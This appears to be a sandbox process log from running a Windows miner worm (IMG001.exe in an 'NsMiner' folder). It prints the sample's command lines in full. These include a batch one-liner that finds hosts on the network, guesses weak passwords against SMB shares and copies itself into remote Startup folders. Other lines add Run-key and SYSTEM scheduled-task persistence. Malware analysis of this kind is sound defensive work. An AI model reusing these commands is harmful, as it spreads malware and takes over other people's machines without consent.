C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1709" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1709" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "10.127.0.1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "10.127.0.1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1709" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1709" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1709" /user:"administrator"4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- NTFS ADS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0206& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- NTFS ADS
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
-
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a5⤵
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "4⤵
-
C:\Windows\SysWOW64\net.exenet view \\10.127.255.2555⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i " "5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
